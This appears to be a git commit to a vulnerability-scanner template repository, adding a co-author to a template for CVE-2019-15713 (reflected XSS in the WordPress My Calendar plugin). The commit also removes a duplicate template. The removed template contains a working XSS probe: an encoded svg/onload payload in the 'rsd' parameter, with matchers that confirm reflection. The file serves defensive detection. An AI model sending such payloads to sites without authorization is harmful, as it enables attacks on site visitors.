duplicate update

patch-1
sandeep 2021-07-20 11:40:23 +05:30
parent ac39bd3284
commit 13e5528c46
2 changed files with 1 additions and 30 deletions

View File

@ -2,7 +2,7 @@ id: CVE-2019-15713
info: info:
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo,dhiyaneshDk
severity: medium severity: medium
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
reference: | reference: |

View File

@ -1,29 +0,0 @@
id: my-calender-xss
info:
name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)
author: dhiyaneshDk
severity: medium
reference: https://wpscan.com/vulnerability/9267
tags: wordpress
requests:
- method: GET
path:
- '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=confirm(/{{randstr}}/)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200